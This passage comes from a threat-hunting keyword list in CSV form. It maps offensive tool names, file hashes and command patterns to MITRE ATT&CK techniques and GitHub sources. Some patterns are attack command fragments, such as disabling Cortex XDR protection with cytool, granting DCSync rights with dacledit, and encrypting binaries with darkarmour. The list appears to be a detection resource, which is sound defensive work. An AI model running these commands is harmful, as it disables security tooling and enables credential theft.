T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*CVE-2020-5902-Scanner/scanner.py*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/aqhmal/CVE-2020-5902-Scanner,1,0,N/A,N/A,1,54,22,2022-12-08T11:03:15Z,2020-07-05T06:19:09Z -*CVE-2021-34527.ps1*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cve-20220-26809_exploit.py*,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/yuanLink/CVE-2022-26809,1,1,N/A,N/A,1,62,26,2022-05-25T00:57:52Z,2022-05-01T13:19:10Z -*CVE-2022-21882.x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cve-2022-23131.py *,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/L0ading-x/cve-2022-23131,1,0,N/A,N/A,1,23,11,2022-02-22T01:45:34Z,2022-02-22T01:39:52Z -*cve-2022-26809-scanVuln.py*,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/yuanLink/CVE-2022-26809,1,1,N/A,N/A,1,62,26,2022-05-25T00:57:52Z,2022-05-01T13:19:10Z -*CVE-2022-30190-follina-Office-MSDT-Fixed*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed,1,1,N/A,N/A,4,387,57,2023-04-13T16:46:26Z,2022-06-02T12:33:18Z -*CVE-2023-20887.git*,offensive_tool_keyword,POC,VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887),T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002,TA0005 - TA0002 - TA0001 - TA0040 - TA0043,N/A,N/A,Exploitation tools,https://github.com/sinsinology/CVE-2023-20887,1,1,N/A,N/A,3,219,44,2023-06-13T14:39:17Z,2023-06-13T13:17:23Z -*cve-2023-21554.nse*,offensive_tool_keyword,poc,Windows Message Queuing vulnerability exploitation with custom payloads,T1192 - T1507,TA0002,N/A,N/A,Network Exploitation Tools,https://github.com/Hashi0x/PoC-CVE-2023-21554,1,1,N/A,N/A,,N/A,,, -*CVE-2023-23397.ps1*,offensive_tool_keyword,POC,CVE-2023-23397 POC Powershell exploit,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/api0cradle/CVE-2023-23397-POC-Powershell,1,1,N/A,N/A,4,340,64,2023-03-17T07:47:40Z,2023-03-16T19:43:39Z -*cvescanner.py*,offensive_tool_keyword,RedTeam_toolkit,Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signorrayan/RedTeam_toolkit,1,1,N/A,N/A,5,499,114,2023-09-27T04:40:54Z,2021-08-18T08:58:14Z -*cyberark/ACLight*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,N/A,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*cyberark/kubesploit*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*cyberark/PipeViewer*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*cypheroth -u neo4j -p *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cytool.exe event_collection disable*,greyware_tool_keyword,cytool,Disables event collection,T1562.001 - T1547.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,8,9,N/A,N/A,N/A,N/A -*cytool.exe protect disable*,greyware_tool_keyword,cytool,Disables protection on Cortex XDR files processes registry and services,T1562.001 - T1547.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,8,9,N/A,N/A,N/A,N/A -*cytool.exe runtime disable*,greyware_tool_keyword,cytool,Disables Cortex XDR (Even with tamper protection enabled),T1562.001 - T1547.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,8,9,N/A,N/A,N/A,N/A -*cytool.exe startup disable*,greyware_tool_keyword,cytool,Disables the cortex agent on startup,T1562.001 - T1547.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,8,9,N/A,N/A,N/A,N/A -*-d kali-linux *,offensive_tool_keyword,kali,Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*D00MFist/Mystikal*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*D00Movenok/HTMLSmuggler*,offensive_tool_keyword,HTMLSmuggler,HTML Smuggling generator&obfuscator for your Red Team operations,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/D00Movenok/HTMLSmuggler,1,1,N/A,10,1,97,13,2023-09-13T22:26:51Z,2023-07-02T08:10:59Z -*d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*d09ccee4-pass-word-0000-98677e2356fd*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*D1rkInject.cpp*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*D1rkInject.exe*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*D1rkInject.iobj*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*D1rkInject.log*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*D1rkInject.sln*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*D1rkInject.vcxproj*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*D1rkInject-main*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*D210570B-F1A0-4B66-9301-F7A54978C178*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,0,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*d2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*d2hvYW1p*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*d3ckx1/Crack-allDBs*,offensive_tool_keyword,Crack-allDBs,bruteforce script for various DB,T1110 - T1110.002 - T1210,TA0006 - TA0001,N/A,N/A,Exploitation tools,https://github.com/d3ckx1/Crack-allDBs,1,1,N/A,8,1,50,19,2021-04-08T06:17:31Z,2021-04-07T11:17:00Z -*d494a4bc-3867-436a-93ef-737f9e0522eb*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*d4acf557a541579d5a8992b9514169fc05c40f26144ad8a560d8ef8d0a3cce0e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*D4Vinci*,offensive_tool_keyword,Github Username,Github user: A hacker. high&low-level coder and a lot of things between. An extremely curious creature loves to learn. Break things or make things that break things.,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/D4Vinci/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*d7fbfd69df3840022dab1f8f2d529ce04abac8cee0234448bfd0a67feb6aea22*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*DA230B64-14EA-4D49-96E1-FA5EFED9010B*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,0,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*da26a5e6b6a29023ee4ab6b54fd24ab13bebed4bcaaac910379119463bba62fa*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*da50f691771c3694ae8821095113a29cf3333e728a31a56f25d08c1a43c9e173*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*dacledit.py -action write -rights DCSync -principal * -target-dn *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*daem0nc0re/PrivFu*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*dafthack/HostRecon*,offensive_tool_keyword,HostRecon,Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.,T1082 - T1087 - T1033,TA0001 - TA0007 - ,N/A,N/A,Information Gathering,https://github.com/dafthack/HostRecon,1,1,N/A,N/A,5,401,114,2017-10-03T13:25:06Z,2017-03-28T14:53:21Z -*dafthack/MailSniper*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*dafthack/MFASweep*,offensive_tool_keyword,FMFASweep,A tool for checking if MFA is enabled on multiple Microsoft Services,T1595 - T1595.002 - T1078.003,TA0006 - TA0009,N/A,N/A,Exploitation tools,https://github.com/dafthack/MFASweep,1,1,N/A,9,10,1033,152,2023-07-25T05:10:55Z,2020-09-22T16:25:03Z -*DallasFR/Cobalt-Clip*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*DallasFR/WinShellcode*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DallasFR/WinShellcode,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*DAMP-master.zip,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z -*DancingRightToLeft.py*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*danielbohannon*,offensive_tool_keyword,Github Username,Github user author of powershell obfuscation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/danielbohannon,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*danielmiessler/SecLists*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*danielmiessler/SecLists.git*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*DanMcInerney/Empire*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*DanMcInerney/icebreaker*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*DanMcInerney/net-creds*,offensive_tool_keyword,net-creds,Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.,T1040 - T1039 - T1036 - T1003,TA0006 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/DanMcInerney/net-creds,1,1,N/A,N/A,10,1560,443,2022-03-23T10:40:42Z,2015-01-07T18:47:46Z -*DanMcInerney/theHarvester*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*daphne-main.zip*,offensive_tool_keyword,daphne,evade auditd by tampering via ptrace,T1054.004 - T1012 - T1057,TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/daphne,1,1,N/A,8,1,12,2,2023-08-03T08:31:40Z,2023-07-31T11:57:29Z -*daphne-x64 * pid=*,offensive_tool_keyword,daphne,evade auditd by tampering via ptrace,T1054.004 - T1012 - T1057,TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/daphne,1,0,N/A,8,1,12,2,2023-08-03T08:31:40Z,2023-07-31T11:57:29Z -*darkarmour -f *.exe --encrypt xor --jmp --loop 7 -o *.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*darkarmour.py*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,1,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -*darkarmour-master*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,1,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -*DarkCoderSc/SharpShellPipe*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,1,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*darkhotel backdoor*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*DarkHotel C2*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*darkhotel data exfil server*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*darkhotel_headers*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*DarkLoadLibrary-maser*,offensive_tool_keyword,DarkLoadLibrary,LoadLibrary for offensive operations,T1071.001 - T1055.002 - T1055.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/DarkLoadLibrary,1,1,N/A,10,9,874,184,2021-10-22T07:27:58Z,2021-06-17T08:33:47Z -*darkr4y/geacon*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 